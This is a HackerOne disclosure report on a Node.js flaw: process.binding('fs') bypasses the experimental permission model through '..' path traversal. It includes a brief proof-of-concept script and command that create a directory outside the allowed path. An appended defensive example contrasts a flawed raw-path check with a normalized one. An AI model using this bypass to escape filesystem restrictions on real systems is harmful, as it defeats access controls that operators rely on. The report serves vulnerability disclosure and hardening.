HackerOne report H1:2051257, reported by rafaelgss
Jul 05, 2023 - 3:54 p.m.

Node.js: process.binding() can bypass the permission model through path traversal


EPSS: 0.001 (Low), percentile 22.2%

Summary: process.binding('fs') bypassed the permission model validation against path traversal

Description: process.binding('fs') can be used to bypass the path traversal validation for the permission model

Steps To Reproduce:

Create the following index.js and store it at /home/pathtraversal/

// index.js
const fs = process.binding('fs')

// 511 is 0o777 (mode); false means non-recursive
fs.mkdir('/home/pathtraversal/../test0', 511, false, null, null)

$ pwd
/home/pathtraversal/
$ node --experimental-permission --allow-fs-read="/home/pathtraversal/*" --allow-fs-write="/home/pathtraversal/*" index.js

/home/test0 will be created, bypassing the permission model validation.

Impact

All the methods exposed by the process.binding('fs') could eventually bypass the permission model using path traversal. It will require the attacker to read the node_file.cc implementation, but that's trivial.
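The class of check this report concerns, shown as an added example that is not part of the original report and is not Node.js's permission-model code: a grant compared against the caller's raw path string versus against the normalized path. All function names are hypothetical, the sample paths are constructed, and the model assumes absolute POSIX paths with no symlink resolution.

```javascript
// Added example: a simplified model of a path-grant check, not Node.js internals.
// Grant string in the form passed to --allow-fs-write on this page.
const GRANT = '/home/pathtraversal/*';

// Collapse '.', '..' and empty segments of an absolute POSIX path.
// Purely lexical: symlinks are not resolved.
function normalizeAbsolute(p) {
  if (!p.startsWith('/')) throw new TypeError('absolute path required');
  const out = [];
  for (const seg of p.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') out.pop(); // popping at the root is a no-op
    else out.push(seg);
  }
  return '/' + out.join('/');
}

// Directory covered by a grant such as "/home/pathtraversal/*".
function grantRoot(grant) {
  return normalizeAbsolute(grant.endsWith('/*') ? grant.slice(0, -2) : grant);
}

// Flawed check: compares the caller-supplied string as-is, so '..' segments survive.
function allowedRaw(p, grant) {
  return p.startsWith(grantRoot(grant) + '/');
}

// Hardened check: normalize first, then compare on a path-segment boundary.
function allowedNormalized(p, grant) {
  const root = grantRoot(grant);
  const real = normalizeAbsolute(p);
  return real === root || real.startsWith(root + '/');
}

// Constructed sample paths; the second is the one used in the report.
const samples = [
  '/home/pathtraversal/data/out.txt',
  '/home/pathtraversal/../test0',
  '/home/pathtraversal/a/../../test0',
  '/home/pathtraversal2/file',
];
for (const p of samples) {
  console.log(p, '->', normalizeAbsolute(p),
    '| raw:', allowedRaw(p, GRANT), '| normalized:', allowedNormalized(p, GRANT));
}
```

The point for reviewers is that normalization has to happen at the layer that enforces the grant, so that every entry point reaching that layer gets the same treatment.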